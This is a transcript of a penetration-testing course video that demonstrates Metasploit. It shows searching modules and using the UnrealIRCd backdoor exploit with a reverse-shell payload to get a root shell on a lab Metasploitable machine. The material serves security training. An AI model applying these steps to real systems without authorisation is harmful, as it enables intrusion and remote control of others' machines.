Join Malcolm Shore for an in-depth discussion in this video A refresher on Metasploit, part of Penetration Testing Essential Training.
- [Instructor] When pentesting, it's useful to provide evidence that vulnerabilities are in fact exploitable. To do this, we can use Metasploit, which is here in the favorites menu. The first time Metasploit starts up, it will create and prepare its databases, otherwise it will skip this initialization step. After completing its startup, the msf prompt appears. Metasploit is now ready for use. Metasploit includes a database of testing modules; assembly and encoding capabilities to manipulate, exploit, and payload code; and the Meterpreter, a payload which provides a powerful remote shell.
We can see that it includes 1,673 exploits, 959 auxiliary modules, 294 post exploitation modules, and 489 payloads in its database. Exploit modules are run against a target system to check whether its vulnerable. Payloads are sent to a target system to demonstrate the exploit was successful by executing on the target. The first Metasploit command I'll enter is help. This shows all the commands that we can issue in Metasploit.
The list starts with the Core Commands, and progresses down to Module Commands, Job Commands, Resource Script Commands, Database Backend Commands, and Credentials Backend Commands. I can issue the command show exploits which lists all the exploits in the Metasploit database. The exploit name appears at the left of this list, and at the right is the disclosure date, the effectiveness of the exploit, and the description of what the exploit achieves.
I can be more selective and use the search command. I'll type help search to see how to do this. Let's look for a Windows 8 exploit. I'll enter search win8. Here we can see the exploits listed for Windows 8. There's only one, the 2012 ikeext_service exploit. If I enter search win7, I get a lot more exploits listed, as well as a set of Windows 7 payloads.
Let's now use Metasploit to check whether a system is vulnerable. I'm going to try an exploit on my Metasploitable system, and I'll start by looking at its IRC service. Let's see what Metasploit has for us. Okay, I can see there's a range of exploits for DOS, Windows, UNIX and so on. I'll select the UNIX exploit called exploit unix irc unreal ircd 3281 backdoor. To do this I enter the command use with the exploit name.
Okay, we're now loaded. I can check the targets this exploit works against by entering the command show targets. In this case, the exploit can determine what kind of targets it has, so we can select Automatic. Let's set that target type. Let's have a look now at what payloads I can use with this exploit. I see that I have a number of command shells, and a Generic Command Execution. I'll use the info command to get more information on the Reverse shell.
Okay, so this doesn't need administrative privileges, and it creates a shell on port 4444. That sounds good. Let's go select it. I'll now see what options I need to set to use this combination of exploit and payload. I'll have to set the remote and local host addresses. The remote address is 10.0.2.8, the Metasploitable system. The local host, this Kali system, is 10.0.2.11.
Okay, let's run the exploit. We can see Metasploit establishing the sockets in the Telnet connection and finally confirming that a command shell has been established on the remote system. The first thing we'll do is check that this is the remote system. Ifconfig displays the IP address 10.0.2.8, the remote system. Now let's check who we are on the remote system.
Okay, we're on the remote system as root. We can list the processes. Okay, I'll first control C and terminate the shell, and that concludes this short refresher on Metasploit.
Cybersecurity expert Malcolm Shore reviews popular pen testing tools, as well as the Bash and Python scripting skills required to be able to acquire, modify, and re-use exploit code. He also provides a refresher on Kali Linux and introduces techniques for testing web services. At the end of this course, you'll be prepared to take more advanced training, and to pursue the popular Offensive Security Certified Professional (OSCP) certification.
- Pen testing overview
- Pen testing tools
- Bash scripting
- Python scripting
- Kali and Metasploit
- Web testing
- Finding exploit code